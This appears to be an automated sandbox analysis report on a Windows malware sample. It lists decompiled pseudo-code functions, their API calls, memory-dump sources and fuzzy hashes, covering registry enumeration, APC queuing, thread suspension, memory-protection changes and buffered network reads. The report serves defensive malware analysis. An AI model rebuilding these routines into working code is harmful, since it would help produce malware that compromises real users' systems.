                              						_t31 = WaitForSingleObject(_t25, 0x4e20);
                              						if(_t31 == 0) {
                              							L20:
                              							if(_t25 != 0) {
                              								CloseHandle(_t25);
                              							}
                              							goto L22;
                              						}
                              					}
                              					goto L12;
                              				}
                              			}

                              Instruction addresses for E013E4B5B above (the decompiler's side-by-side address column, one entry per code line, spilled out of alignment by extraction): 0x013e4b5c through 0x013e4c4d, with 0x00000000 for lines that emit no instruction.

                              APIs
                                • Part of subcall function 013E760A: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,03AD9B78,00000000,?,?,69B25F44,00000005,013ED00C,4D283A53,?,?), ref: 013E7640
                                • Part of subcall function 013E760A: lstrcpy.KERNEL32(00000000,00000000), ref: 013E7664
                                • Part of subcall function 013E760A: lstrcat.KERNEL32(00000000,00000000), ref: 013E766C
                              • CreateEventA.KERNEL32(013ED2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4B9C
                                • Part of subcall function 013E6DFA: RtlFreeHeap.NTDLL(00000000,00000000,013E55CD,00000000,?,?,00000000), ref: 013E6E06
                              • StrChrW.SHLWAPI(013E60B5,00000020,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4BCF
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,013E60B5,00000000,00000000,?,00000000,?,013E60B5,?,?,?), ref: 013E4BFA
                              • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4C28
                              • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,013E60B5,?,?,?), ref: 013E4C40
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 73268831-0
                              • Opcode ID: 27065e193f4e2f15fa717dafce28a6cf2e5e8bdb93c1f1a7d85b56862ef57481
                              • Instruction ID: 2965df122b27fb9f8f891918e5df86b26ed54e264adbdd5a69126bf34bf8e072
                              • Opcode Fuzzy Hash: 27065e193f4e2f15fa717dafce28a6cf2e5e8bdb93c1f1a7d85b56862ef57481
                              • Instruction Fuzzy Hash: 9C21E9726003316BEB319EAC5C8CB9B7ADDEB8C729F050215FA56DB1C5EB60DC114754
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 010364DE: RegCreateKeyA.ADVAPI32(80000001,04B3B7F0,04B38560), ref: 010364F3
                                • Part of subcall function 010364DE: lstrlen.KERNEL32(04B3B7F0,00000000,00000000,0104F072,?,?,?,0102FFEA,00000001,00000001,04B38560), ref: 0103651C
                              • RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043337
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0104334B
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,01023136,?), ref: 01043365
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 01043381
                              • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,01023136,?,?,?), ref: 0104338F
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                              • String ID:
                              • API String ID: 1633053242-0
                              • Opcode ID: ac5b5872e42614f7af076eb816820509ab60bd4ad10c8d68173f1e6bbf9b997d
                              • Instruction ID: 34b5fe7c3b2d93c0fdc7885e053e7cad61dfca12e8743db5013322928c88729f
                              • Opcode Fuzzy Hash: ac5b5872e42614f7af076eb816820509ab60bd4ad10c8d68173f1e6bbf9b997d
                              • Instruction Fuzzy Hash: B21137B6500219FFDB11AF98CCC4CAEBBAEFB88355B11406AF54197220DB329E549B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 49%
                              			E013E2EBD(void* __ecx, void* __edi, intOrPtr _a4) {
                              				unsigned int _v8;
                              				void* _v12;
                              				long _t15;
                              				long _t16;
                              				signed int _t18;
                              				signed int _t19;
                              				unsigned int _t21;
                              				unsigned int _t26;
                              
                              				asm("stosd");
                              				_v12 = _v12 | 0xffffffff;
                              				while(1) {
                              					_t15 = QueueUserAPC(E013E293E, GetCurrentThread(),  &_v12); // executed
                              					if(_t15 == 0) {
                              						break;
                              					}
                              					_t26 = _v8;
                              					_t18 = (_t26 << 0x00000020 | _v12) >> 5;
                              					_push(0);
                              					_push(0x13);
                              					_push(_t26 >> 5);
                              					_push(_t18);
                              					L013EB18E();
                              					_push(1);
                              					_t19 = 3;
                              					_t21 = SleepEx(_t19 << (_t18 & 0x00000007), ??); // executed
                              					_t16 = E013E54DF(_a4, (_t21 >> 6) + _t18);
                              					if(_t16 == 1) {
                              						continue;
                              					} else {
                              					}
                              					L5:
                              					return _t16;
                              				}
                              				_t16 = GetLastError();
                              				goto L5;
                              			}
                              Instruction addresses for E013E2EBD above (the decompiler's side-by-side address column, one entry per code line, spilled out of alignment by extraction): 0x013e2ec8 through 0x013e2f33, with 0x00000000 for lines that emit no instruction.

                              APIs
                              • GetCurrentThread.KERNEL32 ref: 013E2ED3
                              • QueueUserAPC.KERNELBASE(013E293E,00000000,?,?,?,013E2348,?,?), ref: 013E2EDF
                              • _aullrem.NTDLL(000000FF,?,00000013,00000000), ref: 013E2EFC
                              • SleepEx.KERNELBASE(00000003,00000001,?,?,?,013E2348,?,?), ref: 013E2F10
                                • Part of subcall function 013E54DF: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,00000000), ref: 013E553E
                              • GetLastError.KERNEL32(?,?,?,013E2348,?,?), ref: 013E2F2B
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CurrentErrorLastQueueSleepThreadUser_aullremmemcpy
                              • String ID:
                              • API String ID: 2952296216-0
                              • Opcode ID: 0b9a511a52dffc42331d2baf11d17d858507d2b5da378d15ca53835e8f5817dc
                              • Instruction ID: 601ad8fc586015f7fd3bab5b905efc6c34b43e09a33b5acdf35eff1ec8d8f508
                              • Opcode Fuzzy Hash: 0b9a511a52dffc42331d2baf11d17d858507d2b5da378d15ca53835e8f5817dc
                              • Instruction Fuzzy Hash: 680167B2650314BBE7345AA8DC5EFAF7AECE741764F100115F602D61C4E5B0EA01C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualProtect.KERNELBASE(?,?,00000040,00000000,03AE75A8,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EA3
                              • GetLastError.KERNEL32(?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EAB
                              • VirtualQuery.KERNEL32(?,03AE75A8,0000001C,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EC2
                              • VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EE7
                              • SetLastError.KERNEL32(?,?,00000000,03AE75A8,?,0102B24B,00000004,00000000), ref: 01044EF0
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Virtual$ErrorLastProtect$Query
                              • String ID:
                              • API String ID: 148356745-0
                              • Opcode ID: a4e35eb391d3723111112437d5fb27dc414924848ce1d8beea3fcd79b5cc8342
                              • Instruction ID: 18b70bff5f6cf3f5cbb3ebdb754f9b45c6797923da6aeac7095fec0547901d7f
                              • Opcode Fuzzy Hash: a4e35eb391d3723111112437d5fb27dc414924848ce1d8beea3fcd79b5cc8342
                              • Instruction Fuzzy Hash: B60129B6600209FFAF219F99CD84D9EBBB9EB0C3507004426FA82D3124D771D914DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013E4C56(void* __edx) {
                              				void* _v8;
                              				int _v12;
                              				WCHAR* _v16;
                              				void* __edi;
                              				void* __esi;
                              				void* _t23;
                              				intOrPtr _t24;
                              				void* _t26;
                              				intOrPtr _t32;
                              				intOrPtr _t35;
                              				intOrPtr _t38;
                              				intOrPtr _t42;
                              				void* _t45;
                              				void* _t50;
                              				void* _t52;
                              
                              				_t50 = __edx;
                              				_v12 = 0;
                              				_t23 = E013E5EF5(0,  &_v8); // executed
                              				if(_t23 != 0) {
                              					_v8 = 0;
                              				}
                              				_t24 =  *0x13ed2b8; // 0x26ea5a8
                              				_t4 = _t24 + 0x13eee10; // 0x3ad93b8
                              				_t5 = _t24 + 0x13eedb8; // 0x4f0053
                              				_t26 = E013EA415( &_v16, _v8, _t5, _t4); // executed
                              				_t45 = _t26;
                              				if(_t45 == 0) {
                              					StrToIntExW(_v16, 0,  &_v12);
                              					_t45 = 8;
                              					if(_v12 < _t45) {
                              						_t45 = 1;
                              						__eflags = 1;
                              					} else {
                              						_t32 =  *0x13ed2b8; // 0x26ea5a8
                              						_t11 = _t32 + 0x13eee04; // 0x3ad93ac
                              						_t48 = _t11;
                              						_t12 = _t32 + 0x13eedb8; // 0x4f0053
                              						_t52 = E013E5434(_t11, _t12, _t11);
                              						_t59 = _t52;
                              						if(_t52 != 0) {
                              							_t35 =  *0x13ed2b8; // 0x26ea5a8
                              							_t13 = _t35 + 0x13eee4e; // 0x30314549
                              							if(E013E3A79(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                              								_t61 =  *0x13ed294 - 6;
                              								if( *0x13ed294 <= 6) {
                              									_t42 =  *0x13ed2b8; // 0x26ea5a8
                              									_t15 = _t42 + 0x13eed9a; // 0x52384549
                              									E013E3A79(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                              								}
                              							}
                              							_t38 =  *0x13ed2b8; // 0x26ea5a8
                              							_t17 = _t38 + 0x13eee48; // 0x3ad93f0
                              							_t18 = _t38 + 0x13eee20; // 0x680043
                              							_t45 = E013E4FA0(_v8, 0x80000001, _t52, _t18, _t17);
                              							HeapFree( *0x13ed270, 0, _t52);
                              						}
                              					}
                              					HeapFree( *0x13ed270, 0, _v16);
                              				}
                              				_t54 = _v8;
                              				if(_v8 != 0) {
                              					E013E7424(_t54);
                              				}
                              				return _t45;
                              			}
                              Instruction addresses for E013E4C56 above (the decompiler's side-by-side address column, one entry per code line, spilled out of alignment by extraction): 0x013e4c56 through 0x013e4d68.

                              APIs
                              • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03AD93B8,00000000,?,747DF710,00000000,747DF730), ref: 013E4CA5
                              • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,03AD93F0,?,00000000,30314549,00000014,004F0053,03AD93AC), ref: 013E4D42
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,013E50D9), ref: 013E4D54
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: b6698ed66231134e9e952625f13636d46a33ef3d40ce5ca857e81f8436e98ca7
                              • Instruction ID: 5448a6ee852e66d8774e58f00969ab22070dd9d378c1426f0c3ae102ee97dcf6
                              • Opcode Fuzzy Hash: b6698ed66231134e9e952625f13636d46a33ef3d40ce5ca857e81f8436e98ca7
                              • Instruction Fuzzy Hash: BD316F76900329BFDB31DFD8DC8CEAA7BFCEB48714F140065A604EB1E5D6719A488B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E013E5B5B(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                              				void* _v8;
                              				void* __edi;
                              				intOrPtr _t18;
                              				void* _t24;
                              				void* _t30;
                              				void* _t37;
                              				void* _t40;
                              				intOrPtr _t42;
                              
                              				_t37 = __edx;
                              				_t32 = __ecx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t42 =  *0x13ed370; // 0x3ad9b68
                              				_push(0x800);
                              				_push(0);
                              				_push( *0x13ed270);
                              				if( *0x13ed284 >= 5) {
                              					if(RtlAllocateHeap() == 0) {
                              						L6:
                              						_t30 = 8;
                              						L7:
                              						if(_t30 != 0) {
                              							L10:
                              							 *0x13ed284 =  *0x13ed284 + 1;
                              							L11:
                              							return _t30;
                              						}
                              						_t44 = _a4;
                              						_t40 = _v8;
                              						 *_a16 = _a4;
                              						 *_a20 = E013E47A4(_t44, _t40); // executed
                              						_t18 = E013E6A16(_t40, _t44); // executed
                              						if(_t18 != 0) {
                              							 *_a8 = _t40;
                              							 *_a12 = _t18;
                              							if( *0x13ed284 < 5) {
                              								 *0x13ed284 =  *0x13ed284 & 0x00000000;
                              							}
                              							goto L11;
                              						}
                              						_t30 = 0xbf;
                              						E013E55F1();
                              						HeapFree( *0x13ed270, 0, _t40);
                              						goto L10;
                              					}
                              					_t24 = E013E6367(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                              					L5:
                              					_t30 = _t24;
                              					goto L7;
                              				}
                              				if(RtlAllocateHeap() == 0) {
                              					goto L6;
                              				}
                              				_t24 = E013E7132(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25);
                              				goto L5;
                              			}

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 013E5B7F
                                • Part of subcall function 013E7132: GetTickCount.KERNEL32 ref: 013E7146
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E7196
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E71B3
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E71DF
                                • Part of subcall function 013E7132: HeapFree.KERNEL32(00000000,?), ref: 013E71F1
                                • Part of subcall function 013E7132: wsprintfA.USER32 ref: 013E7212
                                • Part of subcall function 013E7132: HeapFree.KERNEL32(00000000,?), ref: 013E7222
                                • Part of subcall function 013E7132: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 013E7250
                                • Part of subcall function 013E7132: GetTickCount.KERNEL32 ref: 013E7261
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 013E5B9D
                              • HeapFree.KERNEL32(00000000,?,?,?,013E512B,00000002,?,?,?,?), ref: 013E5BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$wsprintf$AllocateFree$CountTick
                              • String ID: Uxt
                              • API String ID: 1676223858-1536154274
                              • Opcode ID: 7109a71acfd91867eb2ff9879b58e0de9dcb24a01adb76fa46e7107a7885228d
                              • Instruction ID: 3562fc380de6f465658d670133cf404f5f33f22f318890cdab436307eb46858e
                              • Opcode Fuzzy Hash: 7109a71acfd91867eb2ff9879b58e0de9dcb24a01adb76fa46e7107a7885228d
                              • Instruction Fuzzy Hash: DC2130BA21132AAFDF619F98D948F9A3BFDAB49358F000025F901DB1C0D770E901CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E013E4788(void* __eax) {
                              				long _v8;
                              				char _v12;
                              				char _v16;
                              				intOrPtr _v20;
                              				void* _v24;
                              				void* __esi;
                              				void* _t41;
                              				char* _t42;
                              				long _t43;
                              				void* _t46;
                              				intOrPtr _t47;
                              				intOrPtr* _t48;
                              				char _t50;
                              				long _t54;
                              				char* _t55;
                              				long _t56;
                              				intOrPtr* _t57;
                              				void* _t60;
                              				void* _t61;
                              				void* _t68;
                              				void* _t72;
                              				void* _t73;
                              				void* _t74;
                              				void* _t78;
                              
                              				_t72 = __eax;
                              				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                              					L2:
                              					_t41 = _t72;
                              					_pop(_t73);
                              					_t74 = _t41;
                              					_t42 =  &_v12;
                              					_v8 = 0;
                              					_v16 = 0;
                              					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
                              					if(_t42 == 0) {
                              						_t43 = GetLastError();
                              						_v8 = _t43;
                              						if(_t43 == 0x2efe) {
                              							_v8 = 0;
                              							goto L29;
                              						}
                              					} else {
                              						if(_v12 == 0) {
                              							L29:
                              							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                              						} else {
                              							_t46 =  *0x13ed130(0, 1,  &_v24); // executed
                              							if(_t46 != 0) {
                              								_v8 = 8;
                              							} else {
                              								_t47 = E013E55DC(0x1000);
                              								_v20 = _t47;
                              								if(_t47 == 0) {
                              									_v8 = 8;
                              								} else {
                              									goto L8;
                              									do {
                              										while(1) {
                              											L8:
                              											_t50 = _v12;
                              											if(_t50 >= 0x1000) {
                              												_t50 = 0x1000;
                              											}
                              											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                              											if(_t50 == 0) {
                              												break;
                              											}
                              											_t57 = _v24;
                              											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                              											_t18 =  &_v12;
                              											 *_t18 = _v12 - _v16;
                              											if( *_t18 != 0) {
                              												continue;
                              											} else {
                              											}
                              											L14:
                              											if(WaitForSingleObject( *0x13ed2a4, 0) != 0x102) {
                              												_v8 = 0x102;
                              											} else {
                              												_t55 =  &_v12;
                              												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                              												if(_t55 != 0) {
                              													goto L19;
                              												} else {
                              													_t56 = GetLastError();
                              													_v8 = _t56;
                              													if(_t56 == 0x2f78 && _v12 == 0) {
                              														_v8 = 0;
                              														goto L19;
                              													}
                              												}
                              											}
                              											L22:
                              											E013E6DFA(_v20);
                              											if(_v8 == 0) {
                              												_t54 = E013E44E4(_v24, _t74); // executed
                              												_v8 = _t54;
                              											}
                              											goto L25;
                              										}
                              										_v8 = GetLastError();
                              										goto L14;
                              										L19:
                              									} while (_v12 != 0);
                              									goto L22;
                              								}
                              								L25:
                              								_t48 = _v24;
                              								 *((intOrPtr*)( *_t48 + 8))(_t48);
                              							}
                              						}
                              					}
                              					return _v8;
                              				} else {
                              					_t60 = E013E301A(__eax); // executed
                              					if(_t60 != 0) {
                              						return _t60;
                              					} else {
                              						goto L2;
                              					}
                              				}
                              			}

                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,74785520,013E654E,?,?), ref: 013E8AB7
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,74785520,013E654E,?,?,?), ref: 013E8AD7
                                • Part of subcall function 013E301A: wcstombs.NTDLL ref: 013E30DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLastObjectSingleWaitwcstombs
                              • String ID:
                              • API String ID: 2344289193-0
                              • Opcode ID: 9de10da8eb8079a1c21a57b22153a3d9f571e0386eeff76d19197cca8f9fe284
                              • Instruction ID: f6ec284796252a4ed9d4b5f999eabea3c11a856f79275fe447aee763af0fc04b
                              • Opcode Fuzzy Hash: 9de10da8eb8079a1c21a57b22153a3d9f571e0386eeff76d19197cca8f9fe284
                              • Instruction Fuzzy Hash: 6141ECB1D00329EFEF219FA9D9885AEBBF9FF04349F1044A9E502E6191D7709E409B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0102254E
                              • ResumeThread.KERNELBASE(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 010225D8
                              • WaitForSingleObject.KERNEL32(00000064), ref: 010225E6
                              • SuspendThread.KERNELBASE(?), ref: 010225F9
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                              • String ID:
                              • API String ID: 3168247402-0
                              • Opcode ID: f485c2abde47a29d02a11986309d502a69bebbf0d46cb90fbd9dc05a1edc5640
                              • Instruction ID: c47b885d2089200796cdf585dcadab6171145d7cdbda72e34b18d52499a10077
                              • Opcode Fuzzy Hash: f485c2abde47a29d02a11986309d502a69bebbf0d46cb90fbd9dc05a1edc5640
                              • Instruction Fuzzy Hash: DC418072104302AFE721DF94C984E6BBBE9FF88354F14492DFAD482164D772D954CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E013EA614(void* __ecx, intOrPtr _a4) {
                              				int* _v8;
                              				int _v12;
                              				int* _v16;
                              				int _v20;
                              				int* _v24;
                              				char* _v28;
                              				void* _v32;
                              				long _t33;
                              				char* _t35;
                              				long _t39;
                              				long _t42;
                              				intOrPtr _t47;
                              				void* _t51;
                              				long _t53;
                              
                              				_t51 = __ecx;
                              				_v8 = 0;
                              				_v16 = 0;
                              				_v12 = 0;
                              				_v24 = 0;
                              				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                              				_t53 = _t33;
                              				if(_t53 != 0) {
                              					L18:
                              					return _t53;
                              				}
                              				_t53 = 8;
                              				_t35 = E013E55DC(0x104);
                              				_v28 = _t35;
                              				if(_t35 == 0) {
                              					L17:
                              					RegCloseKey(_v32);
                              					goto L18;
                              				}
                              				_v20 = 0x104;
                              				do {
                              					_v16 = _v20;
                              					_v12 = 0x104;
                              					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                              					_t53 = _t39;
                              					if(_t53 != 0xea) {
                              						if(_t53 != 0) {
                              							L14:
                              							if(_t53 == 0x103) {
                              								_t53 = 0;
                              							}
                              							L16:
                              							E013E6DFA(_v28);
                              							goto L17;
                              						}
                              						_t42 = E013E48E5(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                              						_t53 = _t42;
                              						if(_t53 != 0) {
                              							goto L14;
                              						}
                              						goto L12;
                              					}
                              					if(_v12 <= 0x104) {
                              						if(_v16 <= _v20) {
                              							goto L16;
                              						}
                              						E013E6DFA(_v24);
                              						_v20 = _v16;
                              						_t47 = E013E55DC(_v16);
                              						_v24 = _t47;
                              						if(_t47 != 0) {
                              							L6:
                              							_t53 = 0;
                              							goto L12;
                              						}
                              						_t53 = 8;
                              						goto L16;
                              					}
                              					_v8 = _v8 + 1;
                              					goto L6;
                              					L12:
                              				} while (WaitForSingleObject( *0x13ed2a4, 0) == 0x102);
                              				goto L16;
                              			}

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,013E6096,?), ref: 013EA63A
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • RegEnumKeyExA.KERNELBASE(?,?,?,013E6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,013E6096), ref: 013EA681
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,013E6096,?,013E6096,?,?,?,?,?,013E6096,?), ref: 013EA6EE
                              • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,013E6096,?), ref: 013EA716
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                              • String ID:
                              • API String ID: 3664505660-0
                              • Opcode ID: 68566d74065b2ee22f150eddd136fb16ddbe94f561bb7d8abdf109b0dd23060d
                              • Instruction ID: cae593e805ca4cc97933bafd191eec63fe2f5b0a04c9566fb713a99710899197
                              • Opcode Fuzzy Hash: 68566d74065b2ee22f150eddd136fb16ddbe94f561bb7d8abdf109b0dd23060d
                              • Instruction Fuzzy Hash: 22311976C40229EBCF22ABD98C889EEFFF9EB94358F104026E512B7190D6714A40DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SysAllocString.OLEAUT32(80000002), ref: 013E6AA4
                              • SysAllocString.OLEAUT32(013E4993), ref: 013E6AE7
                              • SysFreeString.OLEAUT32(00000000), ref: 013E6AFB
                              • SysFreeString.OLEAUT32(00000000), ref: 013E6B09
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
• Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
• Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFree
                              • String ID:
                              • API String ID: 344208780-0
                              • Opcode ID: 92e7f83acebc3b27d6e397a2e1a7c0b340ba4c1e057e0632e00b064400b0247e
                              • Instruction ID: 502d50a266e49fa7c836ff977d555754b047c5e10be9cc02172804b10cf0ad71
                              • Opcode Fuzzy Hash: 92e7f83acebc3b27d6e397a2e1a7c0b340ba4c1e057e0632e00b064400b0247e
                              • Instruction Fuzzy Hash: B4314DB190020AEFCB15CF99C8D58AE7FF9BF58344F10842EE50A9B290D7719545CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 41%
                              			E013E6006(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                              				intOrPtr _v12;
                              				void* _v16;
                              				void* _v28;
                              				char _v32;
                              				void* __esi;
                              				void* _t20;
                              				void* _t26;
                              				void* _t29;
                              				void* _t38;
                              				signed int* _t39;
                              				void* _t40;
                              
                              				_t36 = __ecx;
                              				_v32 = 0;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_v12 = _a4;
                              				_t20 = E013E2E2E(__ecx,  &_v32); // executed
                              				_t38 = _t20;
                              				if(_t38 != 0) {
                              					L12:
                              					_t39 = _a8;
                              					L13:
                              					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                              						_t23 =  &(_t39[1]);
                              						if(_t39[1] != 0) {
                              							E013EA2A1(_t23);
                              						}
                              					}
                              					return _t38;
                              				}
                              				_t26 = E013E5EF5(0x40,  &_v16); // executed
                              				if(_t26 != 0) {
                              					_v16 = 0;
                              				}
                              				_t40 = CreateEventA(0x13ed2e4, 1, 0,  *0x13ed374);
                              				if(_t40 != 0) {
                              					SetEvent(_t40);
                              					Sleep(0xbb8);
                              					CloseHandle(_t40);
                              				}
                              				_push( &_v32);
                              				if(_a12 == 0) {
                              					_t29 = E013EA614(_t36); // executed
                              				} else {
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_push(0);
                              					_t29 = E013E48E5(_t36);
                              				}
                              				_t41 = _v16;
                              				_t38 = _t29;
                              				if(_v16 != 0) {
                              					E013E7424(_t41);
                              				}
                              				if(_t38 != 0) {
                              					goto L12;
                              				} else {
                              					_t39 = _a8;
                              					_t38 = E013E4B5B( &_v32, _t39);
                              					goto L13;
                              				}
			}

                              APIs
                              • CreateEventA.KERNEL32(013ED2E4,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730), ref: 013E6057
                              • SetEvent.KERNEL32(00000000), ref: 013E6064
                              • Sleep.KERNEL32(00000BB8), ref: 013E606F
                              • CloseHandle.KERNEL32(00000000), ref: 013E6076
